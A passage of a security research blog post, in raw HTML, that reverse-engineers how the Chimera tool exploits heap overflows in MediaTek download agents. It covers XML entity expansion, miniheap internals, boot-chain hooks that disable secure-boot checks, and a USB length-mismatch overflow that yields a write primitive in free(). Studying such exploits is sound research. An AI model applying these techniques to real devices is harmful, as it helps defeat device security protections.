          memcpy(dest, &quot;&amp;amp;quot;&quot;, 6);  // &quot; -&amp;gt; 6 bytes
          pbVar3 = dest + 6;
        } else if (bVar1 == 0x26) {
          memcpy(dest, &quot;&amp;amp;amp;&quot;, 5);   // &amp;amp; -&amp;gt; 5 bytes
          pbVar3 = dest + 5;
        } else if (bVar1 == &apos;&amp;lt;&apos;) {
          // &amp;lt; -&amp;gt; 4 bytes (&amp;amp;lt;)
          pbVar3 = dest + 4;
        } else if (bVar1 == &apos;&amp;gt;&apos;) {
          // &amp;gt; -&amp;gt; 4 bytes (&amp;amp;gt;)
          pbVar3 = dest + 4;
        } else {
          *dest = bVar1;
          pbVar3 = dest + 1;
        }
        src = (char *)((byte *)src + 1);
        uVar4 = uVar4 - 1;
        dest = pbVar3;
      } while (uVar4 != 0);
    }
    *pbVar3 = 0;
  }
  return (char *)(byte *)pcVar2;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Character&lt;/th&gt;
&lt;th&gt;Expansion&lt;/th&gt;
&lt;th&gt;Size&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&quot;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;quot;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;6 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;amp;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;5 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;lt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;So if you send a filename containing 103 &lt;code&gt;&amp;amp;&lt;/code&gt; characters, &lt;code&gt;mxml_escape&lt;/code&gt; tries to write &lt;code&gt;103 * 5 = 515&lt;/code&gt; bytes into a 512-byte buffer. Classic heap overflow.&lt;/p&gt;
&lt;p&gt;The second AIO command Chimera sends uses exactly this technique: a filename stuffed with &lt;code&gt;&amp;amp;&lt;/code&gt; characters.&lt;/p&gt;
&lt;p&gt;We wrote a quick Python script to simulate the expansion and figure out how much they were overwriting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Input size:    0x17ca (6090 bytes)
Capped size:   0x200 (512 bytes, capped by strnlen)
Expanded size: 0x2ac (684 bytes)
Buffer size:   0x200 (512 bytes)
Overflow:      0xac (172 bytes)

Special characters (in first 0x200 bytes):
  &apos;&amp;amp;&apos;: 43 occurrences (215 bytes expanded)
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Update (02/02/2026):&lt;/strong&gt; Corrected overflow size, &lt;code&gt;strnlen&lt;/code&gt; caps the filename to 512 bytes before expansion, so the actual overflow is 172 bytes, not 7.5KB.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That&apos;s a modest overflow, 172 bytes past the end of the buffer. The ~6KB filename Chimera sends is mostly theater, only the first 512 bytes matter, and most of that is just &lt;code&gt;;&lt;/code&gt; characters that don&apos;t expand at all.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;But.. how is this exactly useful? What is this exactly overwriting?&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Understanding the Heap&lt;/h2&gt;
&lt;p&gt;To understand how to exploit this overflow, we first need to understand how the heap works in both DAs.&lt;/p&gt;
&lt;p&gt;MediaTek uses a simple heap implementation based on &lt;a href=&quot;https://github.com/littlekernel/lk/blob/master/lib/heap/miniheap/miniheap.c&quot;&gt;LK&apos;s (Little Kernel) miniheap&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Depending on the architecture, the DA uses slightly different implementations: &lt;code&gt;miniheap.c&lt;/code&gt; for ARM64 and &lt;code&gt;heap.c&lt;/code&gt; for ARM32. The core logic is mostly the same, but there are some differences in the metadata structures.&lt;/p&gt;
&lt;h3&gt;Initialization&lt;/h3&gt;
&lt;p&gt;One of the very first things DA2 does after booting is initialize its heap:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void init_heap(void)
{
    heap_init(0x4007f100, 0x32000000);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;heap_init&lt;/code&gt; function sets up a global structure called &lt;code&gt;theheap&lt;/code&gt; that tracks the heap state:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    size_t remaining;           // bytes still available
    size_t low_watermark;       // lowest remaining value seen
    mutex_t lock;               // mutex for thread safety
    struct list_node free_list; // head of free chunk list
};
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    struct list_node free_list; // head of free chunk list
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This structure lives in DA2&apos;s &lt;code&gt;.bss&lt;/code&gt; section, not on the heap itself. It holds references to where the heap starts, its size, and the head of the free list.&lt;/p&gt;
&lt;p&gt;In this case, the heap starts at &lt;code&gt;0x4007F100&lt;/code&gt; with a size of &lt;code&gt;0x32000000&lt;/code&gt; (800MB). The base address varies between devices, but the size has remained the same across all DAs we&apos;ve analyzed.&lt;/p&gt;
&lt;h3&gt;Heap Layout&lt;/h3&gt;
&lt;p&gt;The heap is divided into chunks laid out sequentially in memory. Each chunk can be either allocated or free, and they can appear in any order depending on the history of allocations and frees.&lt;/p&gt;
&lt;p&gt;Something like &lt;code&gt;ALLOC -&amp;gt; ALLOC -&amp;gt; FREE -&amp;gt; ALLOC&lt;/code&gt; is perfectly valid.&lt;/p&gt;
&lt;p&gt;Each chunk starts with a header, followed by the body (user data when allocated, unused space when free). The header format differs between chunk types.&lt;/p&gt;
&lt;h4&gt;Free Chunks&lt;/h4&gt;
&lt;p&gt;Free chunks are linked together in a doubly-linked list so the allocator can quickly find available memory. The list is sorted by address, with lower addresses appearing first:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct free_heap_chunk {
    struct list_node node;  // prev/next pointers (embedded struct)
    size_t len;             // total size of this chunk
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;list_node&lt;/code&gt; struct is embedded as the first member:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct list_node {
    struct list_node *prev;
    struct list_node *next;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since &lt;code&gt;list_node&lt;/code&gt; sits at offset 0, you can cast between &lt;code&gt;free_heap_chunk*&lt;/code&gt; and &lt;code&gt;list_node*&lt;/code&gt; freely.&lt;/p&gt;
&lt;h4&gt;Allocated Chunks&lt;/h4&gt;
&lt;p&gt;Allocated chunks are not linked together. They simply sit in memory with a header placed immediately before the user data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct alloc_struct_begin {
    unsigned int magic;  // 0x68656170 (&apos;heap&apos;) / ONLY on ARM32
    void *ptr;           // pointer to the start of the chunk (header included)
    size_t size;         // total size of the chunk (header + user data)
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;ptr&lt;/code&gt; field points back to where the chunk actually starts in memory. This is needed because alignment requirements might add padding between the header and user data, so when freeing, the allocator needs to know where the chunk originally began.&lt;/p&gt;
&lt;p&gt;The most notable difference between architectures is that ARM32 allocations include a &lt;code&gt;magic&lt;/code&gt; field set to &lt;code&gt;0x68656170&lt;/code&gt; (&lt;code&gt;&apos;heap&apos;&lt;/code&gt;), while ARM64 does not (it&apos;s only included when &lt;code&gt;LK_DEBUGLEVEL &amp;gt; 1&lt;/code&gt;, which we&apos;ve never seen enabled in production DAs).&lt;/p&gt;
&lt;h3&gt;Allocation&lt;/h3&gt;
&lt;p&gt;When you call &lt;code&gt;malloc(size)&lt;/code&gt;, the heap:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Adds &lt;code&gt;sizeof(struct alloc_struct_begin)&lt;/code&gt; to the requested size&lt;/li&gt;
&lt;li&gt;Rounds up to pointer alignment&lt;/li&gt;
&lt;li&gt;Walks the free list from the head and uses the first chunk that fits (first-fit allocation)&lt;/li&gt;
&lt;li&gt;If the chunk is larger than needed, splits it: one part becomes allocated, the remainder stays free&lt;/li&gt;
&lt;li&gt;Stores the allocation metadata just before the returned pointer&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Since the free list is sorted by address, lower addresses tend to get allocated first, though this depends on the current fragmentation state.&lt;/p&gt;
&lt;h3&gt;Free&lt;/h3&gt;
&lt;p&gt;When you call &lt;code&gt;free(ptr)&lt;/code&gt;, the heap:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Reads the &lt;code&gt;alloc_struct_begin&lt;/code&gt; metadata before the pointer&lt;/li&gt;
&lt;li&gt;Creates a new free chunk from the allocation&lt;/li&gt;
&lt;li&gt;Inserts it back into the free list (sorted by address), merging with adjacent free chunks if possible&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Exploiting the Free List&lt;/h3&gt;
&lt;p&gt;This same allocator has been the target of previous research. Quarkslab&apos;s &lt;a href=&quot;https://www.sstic.org/media/SSTIC2024/SSTIC-actes/when_vendor1_meets_vendor2_the_story_of_a_small_bu/SSTIC2024-Article-when_vendor1_meets_vendor2_the_story_of_a_small_bug_chain-rossi-bellom_neveu.pdf&quot;&gt;&quot;When Samsung meets MediaTek&quot;&lt;/a&gt; paper exploited a heap overflow in Samsung&apos;s bootloader by abusing the free list unlink operation, so we decided to look at the same primitive.&lt;/p&gt;
&lt;p&gt;When a chunk is removed from the free list during allocation, &lt;code&gt;list_delete&lt;/code&gt; performs a classic unlink:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static inline void list_delete(struct list_node *item)
{
    item-&amp;gt;next-&amp;gt;prev = item-&amp;gt;prev;
    item-&amp;gt;prev-&amp;gt;next = item-&amp;gt;next;
    item-&amp;gt;prev = item-&amp;gt;next = 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we can overflow into a free chunk and corrupt its &lt;code&gt;prev&lt;/code&gt;/&lt;code&gt;next&lt;/code&gt; pointers, we get a write-what-where primitive when that chunk gets unlinked. It&apos;s a classic technique, but still effective when there&apos;s no heap hardening.&lt;/p&gt;
&lt;h2&gt;Debugging the Heap&lt;/h2&gt;
&lt;p&gt;At this point, we understood the heap internals and had a potential overflow primitive. But to actually exploit it, we needed to know the exact heap state when the overflow happens: what&apos;s allocated, what&apos;s free, and where everything sits in memory.&lt;/p&gt;
&lt;p&gt;The Quarkslab researchers faced a similar challenge and solved it by dumping the heap and emulating it offline. We wanted to do the same, but there was a problem: we had no easy way to read memory from the device.&lt;/p&gt;
&lt;p&gt;On older devices, you could use Carbonara to get arbitrary read/write in DA1. But our target&apos;s DA1 was already patched against Carbonara, so that wasn&apos;t an option.&lt;/p&gt;
&lt;h3&gt;A Crazy Idea&lt;/h3&gt;
&lt;p&gt;Then I remembered a project I&apos;d released the previous year: &lt;a href=&quot;https://github.com/R0rt1z2/fenrir&quot;&gt;fenrir&lt;/a&gt;. To understand what it does, you need to know how MediaTek&apos;s boot chain works:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/bootchain-dark.png&quot; alt=&quot;MediaTek boot chain&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The LK partition actually contains an image with multiple sub-partitions inside:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The important thing is that Preloader loads and jumps to &lt;code&gt;bl2_ext&lt;/code&gt; while still running at EL3 (the highest ARM privilege level), expecting it to drop privileges and continue the boot chain. From there, &lt;code&gt;bl2_ext&lt;/code&gt; verifies and loads everything that comes after it.&lt;/p&gt;
&lt;p&gt;fenrir exploits a logic flaw where this sub-partition isn&apos;t properly verified when seccfg is unlocked. By patching the original to skip verification of subsequent partitions, you can boot unsigned or patched LK sub-partitions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[PART] img_auth_required = 0
[PART] Image with header, name: bl2_ext, addr: FFFFFFFFh, mode: FFFFFFFFh, size:654944, magic:58881688h
[PART] part: lk_a img: bl2_ext cert vfy(0 ms)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But for this research, we needed something more powerful. We didn&apos;t just want to skip verification, we wanted to patch Preloader&apos;s memory directly and re-execute certain routines, like the handshake handler.&lt;/p&gt;
&lt;p&gt;So I wrote &lt;a href=&quot;https://github.com/R0rt1z2/sprig&quot;&gt;sprig&lt;/a&gt;, a complete replacement for &lt;code&gt;bl2_ext&lt;/code&gt;. Instead of patching the original, this payload takes its place entirely.&lt;/p&gt;
&lt;p&gt;Preloader loads it expecting the real thing, but instead of continuing the boot chain, it runs at EL3 in the same context as Preloader itself.&lt;/p&gt;
&lt;p&gt;The initial version was simple: disable SBC, SLA, and DAA checks, then jump back to Preloader&apos;s handshake handler.&lt;/p&gt;
&lt;p&gt;This let us load unmodified DAs through &lt;a href=&quot;https://github.com/shomykohai/penumbra&quot;&gt;penumbra&lt;/a&gt;, upload a test file using the AIO command, and then dump the heap to see exactly where our data ended up.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/dumping-heap.png&quot; alt=&quot;Dumping heap with penumbra&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;With the heap dumped, the next step was to find where the AIO signature data landed and start mapping out the heap layout.&lt;/p&gt;
&lt;p&gt;I fired up a hex editor and searched for &lt;code&gt;AAAAAAAAAAAAAAAA...&lt;/code&gt;, which is what our test payload consisted of.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/heap-dump-analysis.png&quot; alt=&quot;Heap dump with AIO signature&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;...and there it was! By analyzing the header, we can see this chunk is allocated (&lt;code&gt;size = 0x200018&lt;/code&gt;) and sits at &lt;code&gt;0x40308BF8&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Since size matters, we repeated the upload with whatever Chimera sends as the first AIO signature. This time it landed at &lt;code&gt;0x40308C18&lt;/code&gt; with a size of &lt;code&gt;0x1E0230&lt;/code&gt; bytes.&lt;/p&gt;
&lt;h2&gt;Dynamic Heap Analysis&lt;/h2&gt;
&lt;p&gt;Now we knew where our data landed, but we needed more: what&apos;s around it, how the heap evolves during the exploit, and ideally, real-time dumps as things happen.&lt;/p&gt;
&lt;p&gt;Since we had no control over what Chimera sends, we needed to be there before Chimera feeds the device with its DAs and commands.&lt;/p&gt;
&lt;h3&gt;Extending sprig&lt;/h3&gt;
&lt;p&gt;Everything flows through Preloader first. DA1 gets downloaded and verified by Preloader, then DA1 downloads and verifies DA2. If we could hook each stage as it loads, we could patch anything we wanted.&lt;/p&gt;
&lt;p&gt;So I extended sprig to install hooks at multiple points in the boot chain:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Preloader hook&lt;/strong&gt;: Right after Preloader receives and verifies DA1, but before jumping to it. This lets us patch DA1 in memory.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;DA1 hook&lt;/strong&gt;: Right after DA1 receives and verifies DA2, but before jumping to it. This lets us patch DA2 in memory.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For DA1, the first thing I did was force the log level to &lt;code&gt;DEBUG&lt;/code&gt; regardless of what the host requests:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void da1_init_hook(void) {
    printf(&quot;DA1 init hook\n&quot;);

    /* force log level to DEBUG */
    writel(0x52800028, 0x40200EC4);
    flush_dcache_range(0x40200EC4, 4);
    invalidate_icache();

    hook_install(&amp;amp;(hook_t)HOOK(0x40200B50, 0x402010AC, da2_init_hook, &quot;da2_init&quot;));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This simple patch meant we&apos;d get full UART output from both DAs, regardless of Chimera trying to silence them with &lt;code&gt;da_log_level=ERROR&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Hooking DA2&lt;/h3&gt;
&lt;p&gt;Once DA2 loads, the real fun begins. Based on what we&apos;d seen in the USB capture, we knew the exploit involved heap allocations, XML parsing, and some kind of error condition.&lt;/p&gt;
&lt;p&gt;So I installed hooks on the functions that seemed most relevant:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void da2_init_hook(void) {
    printf(&quot;DA2 init hook\n&quot;);

    hook_install(&amp;amp;(hook_t)HOOK(0x4000749C, 0x400066AC, free_on_abort_hook, &quot;free_on_abort&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002AAB0, 0x4000687C, malloc_for_file_hook, &quot;malloc_for_file&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002A9F0, 0x400067BC, error_path_hook, &quot;error_path_1&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002AA88, 0x400068CC, error_path_hook, &quot;error_path_2&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4000FBE0, 0x4000693C, mxml_free_hook, &quot;mxml_free&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4000fcac, 0x40006E1C, mxml_inner_free_hook, &quot;mxml_inner_free&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002A554, 0x40006B9C, mxml_escape_malloc_hook, &quot;mxml_escape_malloc&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002A8F4, 0x40006D6C, mxml_escape_hook, &quot;mxml_escape&quot;));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;malloc_for_file_hook&lt;/code&gt;: Tracks where &lt;code&gt;fp_read_host_file&lt;/code&gt; allocates buffers for incoming data&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_escape_malloc_hook&lt;/code&gt;: Tracks the 0x200-byte buffer allocation in &lt;code&gt;mxml_escape&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_escape_hook&lt;/code&gt;: Dumps the escaped output to see if/how it overflows&lt;/li&gt;
&lt;li&gt;&lt;code&gt;error_path_hook&lt;/code&gt;: Catches when &lt;code&gt;fp_read_host_file&lt;/code&gt; hits an error&lt;/li&gt;
&lt;li&gt;&lt;code&gt;free_on_abort_hook&lt;/code&gt;: Monitors what gets freed during error handling&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_free_hook&lt;/code&gt;: Tracks when the XML tree gets cleaned up&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_inner_free_hook&lt;/code&gt;: Tracks the individual &lt;code&gt;free()&lt;/code&gt; calls inside &lt;code&gt;mxml_free&lt;/code&gt; for node data&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each hook logs its arguments, dumps relevant memory regions, and traces the heap state.&lt;/p&gt;
&lt;h2&gt;Heap Layout&lt;/h2&gt;
&lt;p&gt;With the previous hooks in place, we ran Chimera again and watched the UART output. The heap layout became clear:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/heap-layout.png&quot; alt=&quot;Heap layout during exploit&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;When the second AIO command arrives, Chimera sends it with a huge filename full of special characters. This does two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Heap shaping&lt;/strong&gt;: &lt;code&gt;mxmlLoadString&lt;/code&gt; allocates a buffer for the filename string, which ends up right after the AIO2 data buffer due to the allocation size.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;XML expansion overflow&lt;/strong&gt;: When &lt;code&gt;mxml_escape&lt;/code&gt; processes the special characters, it expands them (&lt;code&gt;&amp;amp;&lt;/code&gt; → &lt;code&gt;&amp;amp;amp;&lt;/code&gt;, etc.) and overflows into the AIO1 shellcode buffer.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;A Dead End: The XML Overflow&lt;/h2&gt;
&lt;p&gt;We initially thought the XML expansion was the exploit. After all, it&apos;s still a heap overflow, 172 bytes past the end of the buffer.&lt;/p&gt;
&lt;p&gt;When the second AIO command arrives, &lt;code&gt;mxml_escape&lt;/code&gt; processes the long filename full of special characters.&lt;/p&gt;
&lt;p&gt;The expanded output overflows past the 0x200-byte buffer and corrupts the AIO signature buffer 1 that sits right after it.&lt;/p&gt;
&lt;p&gt;Remember what happens in &lt;code&gt;set_all_in_one_signature_buffer&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (_g_ext_all_in_one_sig != (uint8_t *)0x0) {
    free(_g_ext_all_in_one_sig);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If a previous AIO signature exists, it gets freed before storing the new one. So when the second AIO command completes successfully, the corrupted AIO buffer 1 gets freed.&lt;/p&gt;
&lt;p&gt;We tried to replicate this ourselves: send the first AIO, then send the second AIO with the malicious filename, but without aborting like Chimera does. The result was a crash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;data fault: PC at 0x40009ec4, FAR 0x6d61263b3b3b747c, iss 0x61
ESR 0x96000061: ec 0x25, il 0x2000000, iss 0x61
iframe 0x402836d0:
x0  0x6d61263b3b3b746c x1  0x              3a x2  0x        40075820 x3  0x        40075840
x4  0x        40043d6f x5  0x        400441e7 x6  0x              58 x7  0x              78
x8  0x6d61263b3b3b746c x9  0x3b3b3b3b3b3b3b70 x10 0x             657 x11 0x             654
x12 0x        31bb1508 x13 0x        40070160 x14 0x              68 x15 0x        40282fbf
x16 0xfffffffffffffe02 x17 0x        400441a6 x18 0x               d x19 0x              3a
x20 0x        403084e0 x21 0x        40076000 x22 0x        40070000 x23 0x        40287e40
x24 0x        40070000 x25 0x        40008db8 x26 0x        40055000 x27 0x        40070000
x28 0x               0 x29 0x        402837e0 lr  0x        4002ccbc usp 0x99b04a2404743432
elr 0x        40009ec4
spsr 0x        6200038d
#die sync exception.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the decompiled DA2, the crash happens in &lt;code&gt;free()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;free:
    40009eb8  cbz   ptr, LAB_40009ecc
    40009ebc  ldp   x8, x9, [ptr, #-0x10]   ; load chunk header
    40009ec0  mov   ptr, x8
    40009ec4  str   x9, [x8, #0x10]         ; CRASH HERE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;FAR&lt;/code&gt; shows &lt;code&gt;0x6d61263b3b3b747c&lt;/code&gt;, which is ASCII for &lt;code&gt;ma&amp;amp;;;;t|&lt;/code&gt;, basically corrupted data from the XML expansion overwriting the chunk header.&lt;/p&gt;
&lt;p&gt;At first, this seemed promising: if we could control the chunk metadata with the overflow, maybe we could turn this into an arbitrary write during &lt;code&gt;free()&lt;/code&gt;.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/xml-meme.jpg&quot; alt=&quot;XML meme&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;But there&apos;s a problem: we can&apos;t send arbitrary bytes in the XML filename. Special characters get entity-encoded (&lt;code&gt;&amp;amp;&lt;/code&gt; becomes &lt;code&gt;&amp;amp;amp;&lt;/code&gt;, etc.), and null bytes get rejected by the XML parser entirely.&lt;/p&gt;
&lt;p&gt;To craft a fake chunk header, we&apos;d need to overwrite &lt;code&gt;ptr&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; in the &lt;code&gt;alloc_struct_begin&lt;/code&gt; with controlled values.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/xml-overflow.png&quot; width=&quot;70%&quot; alt=&quot;XML overflow chunk header&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;For example, to fake a pointer like &lt;code&gt;0x40070028&lt;/code&gt;, we&apos;d need to send bytes &lt;code&gt;28 00 07 40 00 00 00 00&lt;/code&gt;, but those null bytes are impossible to include in an XML string.&lt;/p&gt;
&lt;p&gt;After countless hours of brainstorming, experimenting with different character combinations, and desperately searching for some way to sneak controlled bytes through the XML parser, we finally admitted defeat. The XML overflow, despite its impressive size, simply wasn&apos;t exploitable.&lt;/p&gt;
&lt;p&gt;Which meant Chimera had to be doing something else entirely. The XML expansion overflow was a red herring, likely included to confuse people like us :P.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(and it actually did, we wasted way more time than we&apos;d like to admit trying to make something useful out of it).&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;The Real Exploit: USB Overflow&lt;/h2&gt;
&lt;p&gt;Going back to the USB capture, we focused on why Chimera was aborting the second AIO command instead of completing it normally.&lt;/p&gt;
&lt;p&gt;While analyzing more closely, we noticed something odd about how Chimera sends the second AIO file.&lt;/p&gt;
&lt;p&gt;According to the V6 protocol, before sending file data, the host advertises how many bytes the DA should expect. Looking at the capture:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;4F 4B 40 35 31 31 36 20  -&amp;gt;  &quot;OK@5116&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So they tell the DA they&apos;ll send &lt;code&gt;0x13FC&lt;/code&gt; bytes (5116 in decimal). But the actual payload size was &lt;code&gt;0x2410&lt;/code&gt; bytes, nearly twice as much.&lt;/p&gt;
&lt;p&gt;We went back to &lt;code&gt;fp_read_host_file&lt;/code&gt; and looked at the download loop more carefully:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;advertised_size = atoll(vec[1]); // size from host (0x13fc)

*out_data_len = (uint)advertised_size;
buffer = (char *)malloc(advertised_size + 4); // allocate with 4-byte overhead
*out_data = buffer;

(*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);

if (advertised_size != 0) {
    bytes_received = 0;
    do {
        // ... read OK from host ...
        (*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);
        chunk_len = packet_size; // 0x20000 bytes max per USB packet
        status = (*channel-&amp;gt;read)((uint8_t *)(buffer + bytes_received), &amp;amp;chunk_len);
        if (status != 0) goto usb_error;
        bytes_received = bytes_received + chunk_len;
        (*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);
    } while (bytes_received != advertised_size);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The DA allocates a buffer based on &lt;code&gt;advertised_size&lt;/code&gt; plus a 4-byte overhead (probably for a null terminator or length field), but the read loop uses &lt;code&gt;packet_size&lt;/code&gt; (&lt;code&gt;0x20000&lt;/code&gt;) for each chunk, not the remaining bytes.&lt;/p&gt;
&lt;p&gt;The loop only terminates when &lt;code&gt;bytes_received == advertised_size&lt;/code&gt;, so if the host advertises a small size but sends more data than that, the DA will happily write past the end of the allocated buffer.&lt;/p&gt;
&lt;p&gt;In Chimera&apos;s case:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Host advertises &lt;code&gt;0x13FC&lt;/code&gt; bytes&lt;/li&gt;
&lt;li&gt;DA allocates &lt;code&gt;0x1400&lt;/code&gt; bytes (&lt;code&gt;0x13FC + 4&lt;/code&gt; overhead)&lt;/li&gt;
&lt;li&gt;Host actually sends &lt;code&gt;0x1410&lt;/code&gt; bytes&lt;/li&gt;
&lt;li&gt;The DA reads the full chunk, overflowing by &lt;code&gt;0x10&lt;/code&gt; bytes into the next chunk&apos;s header&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And since we&apos;re sending raw USB data (not XML-encoded strings), we have full control over every byte, including null bytes!&lt;/p&gt;
&lt;h2&gt;The Write Primitive&lt;/h2&gt;
&lt;p&gt;On ARM64, the allocated chunk header looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+0x00: ptr   (8 bytes) - pointer to chunk start
+0x08: size  (8 bytes) - allocation size
+0x10: data  (user data starts here)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When &lt;code&gt;free()&lt;/code&gt; is called on a chunk, it does:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;free:
    cbz    ptr, return           ; if (ptr == NULL) return
    ldp    x8, x9, [ptr, #-0x10] ; x8 = alloc.ptr, x9 = alloc.size
    mov    ptr, x8               ; chunk = alloc.ptr
    str    x9, [x8, #0x10]       ; chunk-&amp;gt;len = alloc.size  &amp;lt;-- the write
    b      heap_insert_free_chunk
&lt;/code&gt;&lt;/pre&gt;
